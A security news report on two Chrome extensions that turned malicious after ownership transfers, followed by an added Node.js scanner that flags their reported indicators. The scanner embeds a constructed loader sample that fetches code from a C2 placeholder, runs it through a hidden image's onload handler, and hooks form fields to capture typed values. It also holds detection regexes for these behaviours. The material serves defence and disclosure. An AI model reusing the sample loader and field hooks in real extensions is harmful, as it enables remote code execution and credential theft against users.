Two Google Chrome extensions turned malicious after what appear to be ownership transfers, giving attackers a way to inject arbitrary code, push malware to downstream users, and harvest sensitive data. The affected add-ons are QuickLens – Search Screen with Google Lens, which had 7,000 users, and ShotBird – Scrolling Screenshots, Tweet Images & Editor, which had 800 users when The Hacker News reported the incident.
The extensions were originally associated with developer akshayanuonline[@]gmail[.]com, also known as BuildMelon. According to monxresearch-sec, ShotBird received a Featured flag in January 2025 before it was transferred to loraprice198865[@]gmail[.]com last month, while Annex Security researcher John Tuckner said QuickLens was listed for sale on ExtensionHub on October 11, 2025, and changed ownership on February 1, 2026, to support[@]doodlebuggle[.]top.
The malicious QuickLens update landed on February 17, 2026. Tuckner said it preserved the extension's original functionality but added code to strip security headers such as X-Frame-Options from HTTP responses, which allowed injected scripts to make arbitrary cross-domain requests and bypass Content Security Policy protections.
According to the report, QuickLens also fingerprinted the victim's country, browser, and operating system, then polled an external server every five minutes for JavaScript that was stored in local storage and executed on every page load through a hidden 1×1 GIF <img> element with an onload handler.
“The actual malicious code never appears in the extension's source files,” Tuckner said. “Static analysis shows a function that creates image elements. That's it. The payloads are delivered from the C2 and stored in local storage — they only exist at runtime.”
monxresearch-sec found that ShotBird delivered JavaScript through direct callbacks instead of the 1×1 image method. The injected code displayed a fake Google Chrome update prompt that led users to a ClickFix-style page instructing them to open the Windows Run dialog, launch cmd.exe, and paste a PowerShell command that downloaded a file named googleupdate.exe.
The malware hooked input, textarea, and select HTML elements to capture data entered by victims, including credentials, PINs, card details, tokens, and government identifiers. The report said it also exfiltrated Chrome data such as passwords, browsing history, and extension-related information.
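The staging chain described earlier (stripped security headers, a five-minute poll for code parked in local storage, execution from a hidden image's onload handler) and the form-field hooking described in this paragraph leave a recognisable combination of static indicators even though the payload itself never ships in the package. The Node.js script below is added here as an illustration; it is not code from either extension or from the researchers cited. It scans an unpacked extension's manifest, declarativeNetRequest rule file and scripts for that combination. It assumes header stripping is done with declarativeNetRequest modifyHeaders rules (MV3) or webRequest onHeadersReceived (MV2), treats two or more hits as suspicious, and runs against two constructed samples embedded in the file; the indicator names, thresholds and both samples are this example's own.

```javascript
// Added example (not code from QuickLens, ShotBird, or the researchers cited):
// heuristic static scan of an unpacked Chrome extension for the indicator
// combination reported above. Assumptions: security headers are stripped with
// declarativeNetRequest modifyHeaders rules (MV3) or webRequest
// onHeadersReceived (MV2); two or more hits is treated as "suspicious".
// The two extension samples at the bottom are constructed for this example.

const INDICATORS = [
  {
    id: "broad-host-permissions",
    test: (ext) =>
      [...(ext.manifest.host_permissions ?? []), ...(ext.manifest.permissions ?? [])]
        .includes("<all_urls>"),
  },
  {
    id: "strips-security-headers",
    // MV3 rule that removes X-Frame-Options / CSP, or MV2 webRequest header hook
    test: (ext) =>
      ext.rules.some((rule) =>
        (rule.action?.responseHeaders ?? []).some(
          (h) => h.operation === "remove" &&
            /^(x-frame-options|content-security-policy)$/i.test(h.header)
        )
      ) || /onHeadersReceived/.test(ext.js),
  },
  {
    id: "five-minute-poll",
    // setInterval with a 300000 ms period, or a chrome.alarms period of 5 minutes
    test: (ext) =>
      /setInterval\(|chrome\.alarms\.create\(/.test(ext.js) &&
      /\b300000\b|periodInMinutes\s*:\s*5\b/.test(ext.js),
  },
  {
    id: "hidden-image-loader",
    // img element + onload handler + code read back from storage + dynamic eval
    test: (ext) =>
      /createElement\(\s*['"]img['"]\s*\)/.test(ext.js) &&
      /\.onload\s*=/.test(ext.js) &&
      /(localStorage|chrome\.storage\.local)\.get/.test(ext.js) &&
      /new Function\(|\beval\(/.test(ext.js),
  },
  {
    id: "form-field-hooks",
    // listeners attached to every input/textarea/select on the page
    test: (ext) =>
      /querySelectorAll\(\s*['"][^'"]*\b(input|textarea|select)\b/.test(ext.js) &&
      /addEventListener\(\s*['"](input|keydown|keyup|change)['"]/.test(ext.js),
  },
];

// Scan one unpacked extension: manifest object, parsed DNR rule array, script sources.
function scanExtension({ manifest, rules = [], scripts = [] }) {
  const ext = { manifest, rules, js: scripts.join("\n") };
  const hits = INDICATORS.filter((ind) => ind.test(ext)).map((ind) => ind.id);
  return { hits, suspicious: hits.length >= 2 };
}

// Constructed sample modelled on the reported loader behaviour; not the real payload.
const STAGED_LOADER_SAMPLE = {
  manifest: { manifest_version: 3, host_permissions: ["<all_urls>"],
              permissions: ["storage", "declarativeNetRequest"] },
  rules: [{
    id: 1,
    action: { type: "modifyHeaders", responseHeaders: [
      { header: "x-frame-options", operation: "remove" },
      { header: "content-security-policy", operation: "remove" } ] },
    condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] },
  }],
  scripts: [`
    function poll() {
      fetch(C2 + '/s?c=' + navigator.language + '&ua=' + navigator.userAgent)
        .then(r => r.text()).then(code => localStorage.setItem('cfg', code));
    }
    setInterval(poll, 300000);
    const px = document.createElement('img');
    px.width = 1; px.height = 1;
    px.onload = function () { new Function(localStorage.getItem('cfg'))(); };
    px.src = 'data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7';
    document.body.appendChild(px);
    document.querySelectorAll('input, textarea, select').forEach(el =>
      el.addEventListener('input', e => queue.push(e.target.value)));
  `],
};

// Constructed benign screenshot extension for contrast: it also creates an <img>
// with an onload handler and uses setInterval, but none of the combinations fire.
const SCREENSHOT_SAMPLE = {
  manifest: { manifest_version: 3, permissions: ["activeTab", "storage"] },
  rules: [],
  scripts: [`
    const thumb = document.createElement('img');
    thumb.onload = () => ctx.drawImage(thumb, 0, 0);
    thumb.src = capturedDataUrl;
    setInterval(refreshBadge, 60000);
    document.querySelector('#save').addEventListener('click', saveCapture);
  `],
};

for (const [name, ext] of Object.entries({ STAGED_LOADER_SAMPLE, SCREENSHOT_SAMPLE })) {
  console.log(name, scanExtension(ext));
}
```

Run it with `node scan.js`. As Tuckner's quote makes clear, a scanner like this only sees the loader, never the payload: the storage read, the dynamic eval and the hidden image are the handles it can grab, and confirming what actually executes still requires capturing the server's response at runtime.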
“This is a two-stage abuse chain: extension-side remote browser control plus host-level execution pivot via fake updates,” the researcher said. “The result is high-risk data exposure in-browser and confirmed host-side script execution on at least one affected system.”
The Hacker News said the same threat actor is likely behind both compromises based on the shared command-and-control pattern, ClickFix lures injected into browsing sessions, and ownership transfer as the infection vector. The case mirrors other extension and supply-chain incidents Cyberwarzone has covered, including the Trust Wallet browser extension poisoned in the Shai-Hulud npm attack and the VSCode fork extension attack that hijacked recommendations.

